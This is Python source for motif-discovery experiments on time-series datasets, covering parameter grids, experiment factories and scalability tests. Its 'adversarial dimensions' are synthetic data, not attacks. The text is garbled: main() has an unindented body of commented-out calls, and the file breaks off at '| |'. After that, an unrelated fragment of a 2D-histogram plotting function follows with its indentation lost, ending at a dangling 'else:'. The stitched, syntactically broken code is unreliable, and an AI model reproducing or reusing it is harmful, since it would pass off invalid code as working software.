UCR_PARAMS = [{'datasetName': ['ucr_short'],
               'whichExamples': [range(UCR_TS_PER_DATASET)],
               'instancesPerTs': [DEFAULT_INSTANCES_PER_TS],
               'seed': [SEED]
               }]
UCR_PAIRS_TS_PER_DATASET = 20
UCR_PAIRS_PARAMS = [{'datasetName': ['ucr_pairs'],
                     'whichExamples': [range(UCR_PAIRS_TS_PER_DATASET)],
                     'instancesPerTs': [2],
                     'seed': [SEED]
                     }]
DISHWASHER_PARAMS = [{'datasetName': ['dishwasher']}]
DISHWASHER_2_PARAMS = [{'datasetName': ['dishwasher_2']}]
DISHWASHER_3_PARAMS = [{'datasetName': ['dishwasher_3']}]
DISHWASHER_SHORT_PARAMS = [{'datasetName': ['dishwasher_short']}]
DISHWASHER_GROUPS_PARAMS = [{'datasetName': ['dishwasher_groups'],
                             'whichExamples': [None],
                             'instancesPerTs': [DEFAULT_INSTANCES_PER_TS],
                             'seed': [SEED]
                             }]
DISHWASHER_PAIRS_PARAMS = [{'datasetName': ['dishwasher_pairs'],
                            'whichExamples': [None],
                            'instancesPerTs': [2], # "aim for" 2
                            'minNumInstances': [2], # enforce at least 2
                            'maxNumInstances': [2], # enforce exactly 2
                            'seed': [SEED]
                            }]

# synthetic data for prototyping
SYNTHETIC_TS_PER_TYPE = 50
TRIANGLES_PARAMS = [{'datasetName': ['triangles']}]
RECTS_PARAMS = [{'datasetName': ['rects']}]
SINES_PARAMS = [{'datasetName': ['sines']}]
SHAPES_PARAMS = [{'datasetName': ['shapes']}]
SYNTHETIC_PARAMS = [{'datasetName': [['triangles', 'rects', 'shapes']],
                     'whichExamples': [range(SYNTHETIC_TS_PER_TYPE)],
                     }]
RAND_WALK_PARAMS = [{'datasetName': ['randwalk']}]

# ------------------------ Names -> Params
PARAMS_FOR_DATASET = {
    DATASET_MSRC: MSRC_PARAMS,
    DATASET_TIDIGITS: TIDIGITS_PARAMS,
    DATASET_UCR: UCR_PARAMS,
    DATASET_UCR_PAIRS: UCR_PAIRS_PARAMS,
    DATASET_DISHWASHER: DISHWASHER_PARAMS,
    DATASET_DISHWASHER_2: DISHWASHER_2_PARAMS,
    DATASET_DISHWASHER_3: DISHWASHER_3_PARAMS,
    DATASET_DISHWASHER_SHORT: DISHWASHER_SHORT_PARAMS,
    DATASET_DISHWASHER_GROUPS: DISHWASHER_GROUPS_PARAMS,
    DATASET_DISHWASHER_PAIRS: DISHWASHER_PAIRS_PARAMS,
    DATASET_TRIANGLES: TRIANGLES_PARAMS,
    DATASET_RECTS: RECTS_PARAMS,
    DATASET_SINES: SINES_PARAMS,
    DATASET_SHAPES: SHAPES_PARAMS,
    DATASET_SYNTHETIC: SYNTHETIC_PARAMS,
    DATASET_RAND_WALK: RAND_WALK_PARAMS
}
# ================================================================ Utils
def find_pattern(algo, datasetKey, saveDirFig, saveDirResults,
                 fractionsAdversarialDims=None, fractionsNoiseDims=None,
                 downsampleBy=2, lengths=DEFAULT_LENGTHS, lengthStep=DEFAULT_LENGTH_STEP,
                 ignorePositions=True, requireContainment=False, mdlSearchEachTime=True,
                 whichExamples=None, instancesPerTs=None, onlyReturnPair=False,
                 forceNumDims=None, seedShiftStep=0., keepWhichDims=None):
    '''Run one motif-discovery algorithm over one dataset and save the results.

    Builds a pipeline description of (DataLoading -> [SelectDims] -> DimAdding
    -> FindMotif), runs it through learn.tryParams(), and writes the resulting
    DataFrame as a timestamped csv under saveDirResults/<algo>.

    algo : one of ALGO_MDL, ALGO_MINNEN, ALGO_OUTCAST, ALGO_FF;
        anything else raises ValueError.
    datasetKey : key into PARAMS_FOR_DATASET.
    saveDirFig, saveDirResults : output directories; saveDirFig may be falsy.
    fractionsAdversarialDims, fractionsNoiseDims : fractions of extra dims to
        append to the data; falsy values default to [0.].
    keepWhichDims : if given and non-empty, only these dims of the ts are used.

    Returns the results DataFrame from learn.tryParams().
    '''
    np.random.seed(SEED)
    if lengths is None:
        lengths = np.arange(1./20, 1./8, .005)
    maxOverlapFractions = [.25]
    # results (and optionally figures) go in per-algorithm subdirectories
    saveDirResults = os.path.join(saveDirResults, algo)
    if saveDirFig:
        saveDirFig = os.path.join(saveDirFig, algo)
        if fractionsNoiseDims and any([frac > 0. for frac in fractionsNoiseDims]):
            saveDirFig = os.path.join(saveDirFig, 'noise')
        elif fractionsAdversarialDims and any([frac > 0. for frac in fractionsAdversarialDims]):
            saveDirFig = os.path.join(saveDirFig, 'adversarial')
    if not fractionsNoiseDims:
        fractionsNoiseDims = [0.]
    if not fractionsAdversarialDims:
        fractionsAdversarialDims = [0.]
    print "find_pattern(): using noise dim fractions: ", fractionsNoiseDims
    print "find_pattern(): using adversarial dim fractions: ", fractionsAdversarialDims
    # ------------------------ motif discovery object + params
    if algo == ALGO_MDL:
        finderParams = [
            {'lengths': [lengths],
             'lengthStep': [lengthStep],
             'downsampleBy': [downsampleBy],
             'onlyReturnPair': [onlyReturnPair],
             'threshAlgo': ['mdl'],
             'mdlBits': [6],
             # 'mdlAbandonCriterion': ['bestPairNegative', 'allNegative'],
             'mdlAbandonCriterion': ['allNegative'],
             'mdlSearchEachTime': [mdlSearchEachTime],
             'maxOverlapFraction': maxOverlapFractions,
             'ignorePositions': [ignorePositions],
             'requireContainment': [requireContainment],
             'forceNumDims': [forceNumDims],
             'seedShiftStep': [seedShiftStep],
             # 'saveMotifsDir': [saveDirFig],
             },
        ]
        motifFinding = (MotifExtractor(), finderParams)
    elif algo == ALGO_MINNEN:
        # all instances, no added data
        finderParams = [
            {'lengths': [lengths],
             'lengthStep': [lengthStep],
             'downsampleBy': [downsampleBy],
             'onlyReturnPair': [onlyReturnPair],
             'threshAlgo': ['minnen'],
             'maxOverlapFraction': maxOverlapFractions,
             'ignorePositions': [ignorePositions],
             'requireContainment': [requireContainment],
             'forceNumDims': [forceNumDims],
             'seedShiftStep': [seedShiftStep],
             # 'saveMotifsDir': [saveDirFig]
             },
        ]
        motifFinding = (MotifExtractor(), finderParams)
    elif algo == ALGO_OUTCAST:
        finderParams = [
            {'Lmin': [np.min(lengths)],
             'Lmax': [np.max(lengths)],
             'lengthStep': [lengthStep], # just for spacing small lengths
             'downsampleBy': [downsampleBy],
             'ignorePositions': [ignorePositions],
             'requireContainment': [requireContainment],
             # 'saveMotifsDir': [saveDirFig],
             },
        ]
        motifFinding = (OutcastExtractor(), finderParams)
    elif algo == ALGO_FF:
        finderParams = [
            {'Lmin': [np.min(lengths)],
             'Lmax': [np.max(lengths)],
             'logX': [False],
             'logXblur': [False],
             'downsampleBy': [downsampleBy],
             # 'includeLocalZnorm': [False],
             # 'includeLocalZnorm': [True],
             # 'includeLocalSlope': [False],
             # 'includeLocalSlope': [True],
             # 'includeSaxHashes': [False],
             # 'includeSaxHashes': [True], # drowns out local slopes
             # 'includeMaxFilteredSlope': [False],
             # 'includeMaxFilteredSlope': [True],
             'includeNeighbors': [True],
             # 'includeVariance': [True],
             'saxCardinality': [3],
             'saxWordLen': [3],
             # 'detrend': [True],
             'detrend': [False],
             'ignoreFlat': [True],
             'ignorePositions': [ignorePositions],
             'requireContainment': [requireContainment],
             # 'saveMotifsDir': [saveDirFig],
             },
        ]
        motifFinding = (FFExtractor(), finderParams)
    else:
        raise ValueError("Unrecognized algorithm {}!".format(algo))
    # ------------------------ other objects + params
    datasetParams = PARAMS_FOR_DATASET[datasetKey]
    # NOTE(review): the two assignments below mutate the module-level params
    # dict for this dataset; later calls in the same process see the change
    if whichExamples:
        datasetParams[0]['whichExamples'] = [whichExamples]
    if instancesPerTs:
        datasetParams[0]['instancesPerTs'] = [instancesPerTs]
    dataLoading = [DataLoader(), datasetParams]
    dimAddingParams = [{'fractionAdversarialDims': fractionsAdversarialDims,
                        'fractionNoiseDims': fractionsNoiseDims}]
    dimAdding = [DimsAppender(), dimAddingParams]
    # ------------------------ main
    d = [("DataLoading", [dataLoading]),
         ("DimAdding", [dimAdding]),
         ("FindMotif", [motifFinding])
         ]
    # add option to only use some dimensions of the ts
    if keepWhichDims is not None and len(keepWhichDims):
        dimSelectingParams = [{'whichDims': [keepWhichDims]}]
        dimSelecting = (DimsSelector(), dimSelectingParams)
        stage = ("SelectDims", [dimSelecting])
        d.insert(1, stage) # insert right after loading data
    df = learn.tryParams(d, None, None, crossValidate=False)
    ensureDirExists(saveDirResults)
    fileName = "{}.csv".format(nowAsString())
    df.to_csv(os.path.join(saveDirResults, fileName))
    return df
class Experiment(object):
    """Class to enforce passing in all of the parameters (and provide a
    clean interface to functions that need these params)"""

    def __init__(self, algo, dataset, downsampleBy, ignorePositions,
                 requireContainment=False,
                 lengths=DEFAULT_LENGTHS, lengthStep=DEFAULT_LENGTH_STEP,
                 fractionsNoiseDims=DEFAULT_FRACTIONS_NOISE_DIMS,
                 fractionsAdversarialDims=DEFAULT_FRACTIONS_ADVERSARIAL_DIMS,
                 saveFig=True):
        """algo and dataset are string keys (see the ALGO_* / DATASET_*
        constants); the remaining arguments are forwarded to find_pattern()
        by run(). saveFig=False leaves the figure directory empty."""
        self.algo = algo
        self.dataset = dataset
        self.downsampleBy = downsampleBy
        self.ignorePositions = ignorePositions
        self.requireContainment = requireContainment
        self.lengths = lengths
        self.lengthStep = lengthStep
        self.fractionsNoiseDims = fractionsNoiseDims
        self.fractionsAdversarialDims = fractionsAdversarialDims
        # ''.join() works whether dataset is one name or a list of names
        subdir = ''.join(dataset)
        print "Experiment: using subdir: ", subdir
        self.saveDirFig = ""
        if saveFig:
            self.saveDirFig = os.path.join(OFFICIAL_SAVE_DIR_FIG, subdir)
        self.saveDirRes = os.path.join(OFFICIAL_SAVE_DIR_RESULTS, subdir)

    def run(self, original=False, noise=False, adversarial=False, **kwargs):
        """Invoke find_pattern() on the original data and/or with extra
        noise / adversarial dimensions appended. If none of the three flags
        is set, defaults to the original data only. **kwargs are passed
        through to find_pattern()."""
        saveDirFig = self.saveDirFig
        saveDirRes = self.saveDirRes
        algo = self.algo
        dataset = self.dataset
        # dataset = kwargs.get('dataset', self.dataset)
        # kwargs.pop('dataset')
        # print "run(): using dataset {} (default is {})".format(dataset, self.dataset)
        # kwargs.setdefault('lengths', self.lengths) # hack to allow lengths as kwarg
        lengths = self.lengths
        lengthStep = self.lengthStep
        downsampleBy = self.downsampleBy
        fractionsNoiseDims = self.fractionsNoiseDims
        fractionsAdversarialDims = self.fractionsAdversarialDims
        ignorePositions = self.ignorePositions
        requireContainment = self.requireContainment
        if not (original or noise or adversarial):
            original = True # default to running on original data
        if original: # original dims
            find_pattern(algo, dataset, saveDirFig, saveDirRes,
                         lengths=lengths, lengthStep=lengthStep, downsampleBy=downsampleBy,
                         ignorePositions=ignorePositions,
                         requireContainment=requireContainment, **kwargs)
        if noise: # noise dims
            find_pattern(algo, dataset, saveDirFig, saveDirRes,
                         lengths=lengths, lengthStep=lengthStep, downsampleBy=downsampleBy,
                         ignorePositions=ignorePositions,
                         requireContainment=requireContainment,
                         fractionsNoiseDims=fractionsNoiseDims, **kwargs)
        if adversarial: # adversarial dims
            find_pattern(algo, dataset, saveDirFig, saveDirRes,
                         lengths=lengths, lengthStep=lengthStep, downsampleBy=downsampleBy,
                         ignorePositions=ignorePositions,
                         requireContainment=requireContainment,
                         fractionsAdversarialDims=fractionsAdversarialDims, **kwargs)
# ============================================================== Official Stuff
# ------------------------------------------------ experiment creation / params
# Factories: one pre-configured Experiment per dataset; commented-out lines
# are alternative settings that were tried.
def create_msrc_experiment(algo):
    return Experiment(algo, DATASET_MSRC, downsampleBy=2, ignorePositions=True)
    # return Experiment(algo, DATASET_MSRC, downsampleBy=5, ignorePositions=True)

def create_tidigits_experiment(algo):
    return Experiment(algo, DATASET_TIDIGITS, downsampleBy=2,
                      # ignorePositions=False, requireContainment=True, lengths=[1./16, 1./8])
                      ignorePositions=False, requireContainment=False, lengths=[1./16, 1./8])

def create_dishwasher_experiment(algo):
    return Experiment(algo, DATASET_DISHWASHER_GROUPS, downsampleBy=1, ignorePositions=False)
    # return Experiment(algo, DATASET_DISHWASHER_GROUPS, downsampleBy=5, ignorePositions=False)

def create_ucr_experiment(algo):
    return Experiment(algo, DATASET_UCR, downsampleBy=2, ignorePositions=False)
# ------------------------------------------------ mdl
# Thin wrappers: build the canned Experiment for a dataset and run it with
# the named algorithm, forwarding **kwargs to Experiment.run().
def run_msrc_mdl(**kwargs):
    create_msrc_experiment(ALGO_MDL).run(**kwargs)

def run_tidigits_mdl(**kwargs):
    create_tidigits_experiment(ALGO_MDL).run(**kwargs)

def run_dishwasher_mdl(**kwargs):
    create_dishwasher_experiment(ALGO_MDL).run(**kwargs)

def run_ucr_mdl(**kwargs):
    create_ucr_experiment(ALGO_MDL).run(**kwargs)

# ------------------------------------------------ minnen
def run_msrc_minnen(**kwargs):
    create_msrc_experiment(ALGO_MINNEN).run(**kwargs)

def run_tidigits_minnen(**kwargs):
    create_tidigits_experiment(ALGO_MINNEN).run(**kwargs)

def run_dishwasher_minnen(**kwargs):
    create_dishwasher_experiment(ALGO_MINNEN).run(**kwargs)

def run_ucr_minnen(**kwargs):
    create_ucr_experiment(ALGO_MINNEN).run(**kwargs)

# ------------------------------------------------ outcast
def run_msrc_outcast(**kwargs):
    create_msrc_experiment(ALGO_OUTCAST).run(**kwargs)

def run_tidigits_outcast(**kwargs):
    create_tidigits_experiment(ALGO_OUTCAST).run(**kwargs)

def run_dishwasher_outcast(**kwargs):
    create_dishwasher_experiment(ALGO_OUTCAST).run(**kwargs)

def run_ucr_outcast(**kwargs):
    create_ucr_experiment(ALGO_OUTCAST).run(**kwargs)

# ------------------------------------------------ ffs
def run_msrc_ff(**kwargs):
    create_msrc_experiment(ALGO_FF).run(**kwargs)

def run_tidigits_ff(**kwargs):
    create_tidigits_experiment(ALGO_FF).run(**kwargs)

def run_dishwasher_ff(**kwargs):
    create_dishwasher_experiment(ALGO_FF).run(**kwargs)

def run_ucr_ff(**kwargs):
    create_ucr_experiment(ALGO_FF).run(**kwargs)
# ------------------------------------------------ best pairs
# "Pair" experiments: the *_motif variants pass onlyReturnPair=True to the
# extractor; the *_ff variants run FF with a small length range.
def run_dishwasher_pairs_motif(**kwargs):
    e = Experiment(ALGO_MINNEN, DATASET_DISHWASHER_PAIRS, downsampleBy=1,
                   ignorePositions=False, lengths=[150])
    e.run(onlyReturnPair=True, **kwargs)

def run_dishwasher_pairs_ff(**kwargs):
    e = Experiment(ALGO_FF, DATASET_DISHWASHER_PAIRS, downsampleBy=1,
                   ignorePositions=False, lengths=[100, 200])
    e.run(**kwargs)

def run_ucr_pairs_motif(**kwargs):
    e = Experiment(ALGO_MINNEN, DATASET_UCR_PAIRS, downsampleBy=2,
                   ignorePositions=False, lengths=[.17])
    e.run(onlyReturnPair=True, **kwargs)

def run_ucr_pairs_ff(**kwargs):
    e = Experiment(ALGO_FF, DATASET_UCR_PAIRS, downsampleBy=2,
                   ignorePositions=False, lengths=[.1, .2])
    e.run(**kwargs)

def run_synthetic_pairs_motif(**kwargs):
    e = Experiment(ALGO_MINNEN, DATASET_SYNTHETIC, downsampleBy=1,
                   ignorePositions=False, lengths=[50])
    e.run(onlyReturnPair=True, **kwargs)

def run_synthetic_pairs_ff(**kwargs):
    e = Experiment(ALGO_FF, DATASET_SYNTHETIC, downsampleBy=1,
                   ignorePositions=False, lengths=[.1, .2])
    e.run(instancesPerTs=2, **kwargs)
# ------------------------------------------------ scalability
DEFAULT_SCALABILITY_M_LENGTHS = np.arange(50, 100)
DEFAULT_SCALABILITY_N = 5000
# NOTE(review): name is misspelled ("SCALABIILTY") but referenced as-is
# elsewhere, so it must stay spelled this way.
SCALABIILTY_N_FOR_M_LENGTHS = 5000
# DEFAULT_SCALABILITY_N = 1100 # TODO remove after test
# DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000, 2000, 4000, 8000, 16000]
DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000, 2000, 4000, 8000]
# DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000]
# DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000] # TODO remove after test
# [min, max) motif-length windows swept by the m_length scalability test
DEFAULT_SCALABILITY_M_LENGTH_MINS_MAXES = [[50, 100],
                                           [100, 150],
                                           [150, 200],
                                           [200, 250],
                                           [250, 300],
                                           [300, 350],
                                           [350, 400]]
                                           # [350, 400],
                                           # [400, 450],
                                           # [450, 500]]
# [min, max) spans (widening around 150) swept by the m_span test
DEFAULT_SCALABILITY_M_SPAN_MINS_MAXES = [[150, 151],
                                         [140, 160],
                                         [130, 170],
                                         [120, 180],
                                         [110, 190],
                                         [100, 200]]
                                         # [90, 210],
                                         # [80, 220],
                                         # [70, 230],
                                         # [60, 240],
                                         # [50, 250]]
SCALABILITY_RESULTS_DIR = os.path.join(OFFICIAL_SAVE_DIR_RESULTS, 'scalability')
# Keys naming which quantity a scalability test varies.
SCALABILITY_TEST_N_LENGTH = 'n_length'
SCALABILITY_TEST_M_LENGTH = 'm_length'
SCALABILITY_TEST_M_SPAN = 'm_span'
SCALABILITY_ALL_TESTS = [SCALABILITY_TEST_N_LENGTH, SCALABILITY_TEST_M_LENGTH,
                         SCALABILITY_TEST_M_SPAN]
def save_data_frame(df, saveDir):
    '''Write `df` as a timestamped csv inside `saveDir`, creating the
    directory first if necessary.'''
    ensureDirExists(saveDir)
    outPath = os.path.join(saveDir, "{}.csv".format(nowAsString()))
    df.to_csv(outPath)
def find_pattern_simple(datasetKey, algoKey, datasetParams=None, algoParams=None,
                        saveDir=None):
    '''Minimal (DataLoading -> FindMotif) run used by the scalability tests.

    datasetParams / algoParams default to the module-level grids for the
    given keys. If saveDir is given, the result DataFrame is also saved
    there as a timestamped csv. Returns the DataFrame.
    '''
    if not datasetParams:
        datasetParams = PARAMS_FOR_DATASET[datasetKey]
    if not algoParams:
        algoParams = PARAMS_FOR_ALGO[algoKey]
    print "datasetParams", datasetParams
    print "algoParams", algoParams
    if algoKey == ALGO_MINNEN or algoKey == ALGO_MDL:
        algoObj = MotifExtractor()
    elif algoKey == ALGO_FF:
        algoObj = FFExtractor()
    # NOTE(review): any other algoKey leaves algoObj unbound, so the line
    # below raises NameError; consider raising ValueError like find_pattern()
    dataLoading = [DataLoader(), datasetParams]
    motifFinding = [algoObj, algoParams]
    d = [("DataLoading", [dataLoading]),
         ("FindMotif", [motifFinding])
         ]
    df = learn.tryParams(d, None, None, crossValidate=False)
    if saveDir:
        save_data_frame(df, saveDir)
    return df
def setLengthsInAlgoParams(algoKey, algoParams, lengths):
    '''Write the candidate motif lengths into algoParams (mutated in place),
    using whichever key convention the given algorithm expects.'''
    paramGrid = algoParams[0]
    if algoKey == ALGO_FF:
        # FF takes a [Lmin, Lmax] length range
        paramGrid['Lmin'] = [np.min(lengths)]
        paramGrid['Lmax'] = [np.max(lengths)]
    else:
        # the motif extractors take an explicit list of lengths
        paramGrid['lengths'] = [lengths]
        paramGrid['lengthStep'] = [1]
def test_scalability(datasetKey, algoKey, whichTest=None, iterNum=1):
    '''Run one algorithm on one dataset while varying a single scale factor.

    whichTest selects what is varied:
      SCALABILITY_TEST_N_LENGTH -- time series length n (data is cropped)
      SCALABILITY_TEST_M_LENGTH -- motif length window (fixed n)
      SCALABILITY_TEST_M_SPAN   -- span of candidate motif lengths (fixed n)
    Any other value raises ValueError.

    iterNum must be >= 1; the function recurses with iterNum - 1 so each
    iteration gets a different seed, and the per-iteration DataFrames
    (tagged with an 'iter' column) are concatenated. Results are saved both
    incrementally and in aggregate. Returns the combined DataFrame.
    '''
    if iterNum < 1:
        raise ValueError("Iteration number must be >= 1! Got {}".format(iterNum))
    datasetParams = PARAMS_FOR_DATASET[datasetKey]
    datasetParams[0]['seed'] = [iterNum] # different across iterations
    algoParams = PARAMS_FOR_ALGO[algoKey]
    nLengths = np.array(DEFAULT_SCALABILITY_N_LENGTHS)
    mLengths = []
    for pair in DEFAULT_SCALABILITY_M_LENGTH_MINS_MAXES:
        mLengths.append(np.arange(pair[0], pair[1]))
    mSpans = []
    for pair in DEFAULT_SCALABILITY_M_SPAN_MINS_MAXES:
        mSpans.append(np.arange(pair[0], pair[1]))
    saveDir = os.path.join(SCALABILITY_RESULTS_DIR, datasetKey, algoKey, whichTest)
    dfs = []
    subdir = os.path.join(saveDir, 'incremental-{}'.format(iterNum))
    if whichTest == SCALABILITY_TEST_N_LENGTH:
        setLengthsInAlgoParams(algoKey, algoParams, DEFAULT_SCALABILITY_M_LENGTHS)
        for n in nLengths:
            datasetParams[0]['cropDataLength'] = [n]
            df = find_pattern_simple(datasetKey, algoKey, datasetParams, algoParams,
                                     saveDir=subdir)
            dfs.append(df)
    elif whichTest == SCALABILITY_TEST_M_LENGTH:
        datasetParams[0]['cropDataLength'] = [SCALABIILTY_N_FOR_M_LENGTHS]
        for lengths in mLengths:
            setLengthsInAlgoParams(algoKey, algoParams, lengths)
            df = find_pattern_simple(datasetKey, algoKey, datasetParams, algoParams,
                                     saveDir=subdir)
            dfs.append(df)
    elif whichTest == SCALABILITY_TEST_M_SPAN:
        datasetParams[0]['cropDataLength'] = [DEFAULT_SCALABILITY_N]
        for lengths in mSpans:
            setLengthsInAlgoParams(algoKey, algoParams, lengths)
            df = find_pattern_simple(datasetKey, algoKey, datasetParams, algoParams,
                                     saveDir=subdir)
            dfs.append(df)
    else:
        # BUG FIX: previously referenced the undefined name `which`, which
        # raised NameError instead of the intended ValueError
        raise ValueError("can't run unknown scalability test {}!".format(whichTest))
    df = pd.concat(dfs, ignore_index=True)
    df['iter'] = pd.Series(np.zeros(df.shape[0]) + iterNum) # tag rows with iteration
    save_data_frame(df, saveDir)
    # recurse to iterate multiple times
    if iterNum > 1:
        df2 = test_scalability(datasetKey, algoKey, whichTest, iterNum - 1)
        df = pd.concat([df, df2], ignore_index=True)
    return df
def run_scalability_experiments(datasets=None, algorithms=None, tests=None, numIters=1):
    '''Run every requested scalability test for each (dataset, algorithm) pair.

    Falsy arguments fall back to defaults: random-walk + dishwasher data,
    the minnen/mdl/ff algorithms, and all tests in SCALABILITY_ALL_TESTS.
    '''
    if not datasets:
        datasets = [DATASET_RAND_WALK, DATASET_DISHWASHER]
    if not algorithms:
        algorithms = [ALGO_MINNEN, ALGO_MDL, ALGO_FF]
    if not tests:
        tests = SCALABILITY_ALL_TESTS
    # wrap single strings in a list
    # NOTE(review): `synth` does not appear in this file's visible imports --
    # confirm where ensureIsCollection comes from before relying on this
    datasets = synth.ensureIsCollection(datasets)
    algorithms = synth.ensureIsCollection(algorithms)
    tests = synth.ensureIsCollection(tests)
    for dataset in datasets:
        for algo in algorithms:
            for test in tests:
                print "SCALABILITY: testing {} {} {}".format(
                    dataset, algo, test)
                test_scalability(dataset, algo, test, numIters)
# ================================================================ Main
def main():
# run_scalability_experiments(algorithms=ALGO_FF)
# run_scalability_experiments(algorithms=ALGO_MINNEN)
# run_tidigits_outcast(whichExamples=range(5))
# run_ucr_outcast(whichExamples=range(1))
# ------------------------ best pair experiments
# run_synthetic_pairs_motif()
# run_synthetic_pairs_ff(whichExamples=range(20))
# run_ucr_ff(whichExamples=range(1))
# run_ucr_ff(whichExamples=range(3))
# run_ucr_pairs_motif()
# run_ucr_pairs_ff(whichExamples=range(1))
# run_dishwasher_pairs_motif(whichExamples=range(2))
# run_dishwasher_pairs_ff(whichExamples=range(5))
# run_tidigits_ff(original=True, whichExamples=range(1))
# run_tidigits_ff(original=True, whichExamples=range(5))
run_tidigits_ff(original=True, whichExamples=range(10))
# run_tidigits_ff(original=True, whichExamples=[range(50)])
# run_msrc_ff(original=True, whichExamples=range(1))
# run_msrc_ff(original=True, whichExamples=range(10))
# run_msrc_ff(original=True, whichExamples=range(0,100,10))
# run_msrc_ff(original=True, whichExamples=[range(50)])
# run_dishwasher_ff(original=True, whichExamples=range(1))
# run_dishwasher_ff(original=True, whichExamples=range(5))
# run_dishwasher_ff(original=True, whichExamples=range(1), keepWhichDims=[5])
# run_ucr_ff(original=True, whichExamples=range(2))
# run_msrc_outcast(original=True, whichExamples=[range(1)])
# run_tidigits_outcast(original=True, whichExamples=[range(1)])
# run_msrc_mdl(original=True, whichExamples=[range(1)])
# aha; recording 16 crashes it for some reason...
# run_msrc_mdl(original=True, whichExamples=[range(15, 17)]) # like 200s
# run_msrc_mdl(original=True, whichExamples=range(50), seedShiftStep=.1)
# run_msrc_mdl(original=True, whichExamples=range(50), forceNumDims=1)
# run_msrc_mdl(original=True, whichExamples=range(50), forceNumDims=-1)
# run_msrc_mdl(original=True, whichExamples=[range(1)], mdlSearchEachTime=True)
# run_msrc_mdl(original=True, whichExamples=[range(1)], mdlSearchEachTime=False)
# run_msrc_mdl(original=True, whichExamples=[range(10)])
# run_msrc_mdl(original=True)
# run_msrc_mdl(noise=True)
# run_msrc_mdl(adversarial=True)
# run_tidigits_mdl(original=True, whichExamples=range(10))
# run_tidigits_mdl(original=True, whichExamples=range(2), forceNumDims=1) # like 10s
# run_tidigits_mdl(original=True, whichExamples=range(50), forceNumDims=1)
# run_tidigits_mdl(original=True, whichExamples=range(50), forceNumDims=-1)
# run_tidigits_mdl(original=True, whichExamples=range(50), seedShiftStep=.1)
# run_tidigits_mdl(original=True, whichExamples=[range(5)], mdlSearchEachTime=True) # like 10s
# run_tidigits_mdl(original=True, whichExamples=[range(5)], mdlSearchEachTime=False) # like 10s
# run_tidigits_mdl(original=True)
# run_tidigits_mdl(noise=True)
# run_tidigits_mdl(adversarial=True)
# run_dishwasher_mdl(original=True, whichExamples=[range(2)])
# run_dishwasher_mdl(original=True, whichExamples=[range(1, 2)], mdlSearchEachTime=True) # like 120s
# run_dishwasher_mdl(original=True, whichExamples=[range(1, 2)], | |
(str) : Data keys to plot.
weight_key (str) : Data key for data to use as a weight. By None, no weight.
x_data_args, y_data_args (dicts) : Keyword arguments to be passed only to x or y.
slices (int or tuple of slices) : How to slice the data.
ax (axis) : What axis to use. By None creates a figure and places the axis on it.
x_range, y_range ( (float, float) ) : Histogram edges. If None, all data is enclosed. If list, set manually.
If float, is +- x_range*length scale at that snapshot.
n_bins (int) : Number of bins in the histogram.
vmin, vmax (float) : Limits for the colorbar.
aspect (str) : What should the aspect ratio of the plot be?
plot_halos (bool) : Whether or not to plot merger tree halos on top of the histogram.
Only makes sense for when dealing with positions.
add_colorbar (bool) : If True, add a colorbar to colorbar_args
colorbar_args (axis) : What axis to add the colorbar to. By None, is ax.
x_label, y_label (str) : Axes labels.
add_x_label, add_y_label (bool) : Include axes labels?
plot_label (str or dict) : What to label the plot with. By None, uses self.label.
Can also pass a dict of full args.
outline_plot_label (bool) : If True, add an outline around the plot label.
label_galaxy_cut (bool) : If true, add a label that indicates how the galaxy was defined.
label_redshift (bool) : If True, add a label indicating the redshift.
label_fontsize (int) : Fontsize for the labels.
tick_param_args (args) : Arguments to pass to ax.tick_params. By None, don't change inherent defaults.
out_dir (str) : If given, where to save the file.
fix_invalid (bool) : Fix invalid values.
line_slope (float) : If given, draw a line with the given slope.
'''
if isinstance( slices, int ):
sl = ( slice(None), slices )
else:
sl = slices
varying_kwargs = {
'x': x_data_args,
'y': y_data_args,
'weight': weight_data_args
}
data_kwargs = utilities.dict_from_defaults_and_variations( kwargs, varying_kwargs )
# Get data
if x_data is None:
x_data = self.data_object.get_selected_data( x_key, sl=sl, *args, **data_kwargs['x'] ).copy()
if y_data is None:
y_data = self.data_object.get_selected_data( y_key, sl=sl, *args, **data_kwargs['y'] ).copy()
if y_div_function is not None:
y_div_values = y_div_function( x_data )
y_data /= y_div_values
# Fix NaNs
if fix_invalid:
x_mask = np.ma.fix_invalid( x_data ).mask
y_mask = np.ma.fix_invalid( y_data ).mask
mask = np.ma.mask_or( x_mask, y_mask )
x_data = np.ma.masked_array( x_data, mask=mask ).compressed()
y_data = np.ma.masked_array( y_data, mask=mask ).compressed()
if weight_key is None:
weights = None
else:
if weight_data is None:
weights = self.data_object.get_selected_data(
weight_key,
sl=sl,
*args,
**data_kwargs['weight']
).flatten()
else:
weights = weight_data
if fix_invalid:
weights = np.ma.masked_array( weights, mask=mask ).compressed()
if n_bins_x is None:
n_bins_x = n_bins
if n_bins_y is None:
n_bins_y = n_bins
if x_range is None:
x_range = [ x_data.min(), x_data.max() ]
elif isinstance( x_range, float ):
x_range = np.array( [ -x_range, x_range ])*self.data_object.length_scale[slices]
if y_range is None:
y_range = [ y_data.min(), y_data.max() ]
elif isinstance( y_range, float ):
y_range = np.array( [ -y_range, y_range ])*self.data_object.length_scale[slices]
if x_edges is None:
if x_scale == 'log':
x_edges = np.logspace( np.log10( x_range[0] ), np.log10( x_range[1] ), n_bins_x )
else:
x_edges = np.linspace( x_range[0], x_range[1], n_bins_x )
if y_edges is None:
if y_scale == 'log':
y_edges = np.logspace( np.log10( y_range[0] ), np.log10( y_range[1] ), n_bins_y )
else:
y_edges = np.linspace( y_range[0], y_range[1], n_bins_y )
# Make the histogram
hist2d, x_edges, y_edges = np.histogram2d( x_data, y_data, [x_edges, y_edges], weights=weights, normed=normed )
# If doing an average, divide by the number in each bin
if average:
average_hist2d, x_edges, y_edges = np.histogram2d( x_data, y_data, [x_edges, y_edges], normed=normed )
hist2d /= average_hist2d
# If making the y-axis conditional, divide by the distribution of data for the x-axis.
if conditional_y:
hist_x, x_edges = np.histogram( x_data, x_edges, normed=normed )
hist2d /= hist_x[:,np.newaxis]
# Divide the histogram bins by this array
if hist_div_arr is not None:
hist2d /= hist_div_arr
# Mask bins below a specified value
if min_bin_value_displayed is not None:
hist2d = np.ma.masked_where(
hist2d < min_bin_value_displayed,
hist2d,
)
# Plot
if ax is None:
fig = plt.figure( figsize=(10,9), facecolor='white' )
ax = plt.gca()
if z_scale == 'linear':
norm = plt_colors.Normalize()
elif z_scale == 'log':
norm = plt_colors.LogNorm()
else:
